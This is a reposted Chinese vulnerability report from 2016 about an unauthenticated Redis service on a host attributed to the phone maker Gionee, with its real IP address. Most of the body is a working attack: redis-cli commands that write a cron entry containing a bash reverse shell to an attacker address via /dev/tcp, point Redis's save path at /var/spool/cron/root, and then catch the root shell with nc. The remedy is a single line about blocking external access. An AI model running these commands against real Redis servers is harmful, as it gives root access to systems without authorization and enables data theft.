栏目导航: 首页 > 检测提权 > 提权渗透 > 内容

金立某处Redis配置不当已获取主机root权限

www.hx99.net    时间: 2016-11-09    阅读: 次     整理: 华西安全网

 

漏洞标题 金立某处Redis配置不当已获取主机root权限
相关厂商 gionee.com
漏洞作者 null_z
提交时间 2016-05-25 15:35
公开时间 2016-07-10 12:20
漏洞类型 系统/服务运维配置不当
危害等级
自评Rank 15
漏洞状态 厂商已经确认
Tags标签  

漏洞详情

这儿存在 redis未授权访问 42.121.237.23

屏幕快照 2016-05-25 14.30.18.png

 

利用方式不需要猜 web路径,写到cron里面

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xxx.xxx.xx.120/2333 0>&1\n\n"|redis-cli -h 42.121.237.23 -x set 1
redis-cli -h 42.121.237.23
42.121.237.23:6379> config set dir /var/spool/cron
OK
42.121.237.23:6379> config set dbfilename root
OK
42.121.237.23:6379> save
OK

 

然后本机nc -lvv 2333

一会儿shell就弹回来了。

 

漏洞证明:

 

屏幕快照 2016-05-25 14.44.36.png

 

这个uid.sql有意思啊

屏幕快照 2016-05-25 14.45.07.png

 

修复方案:

禁止外部访问

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭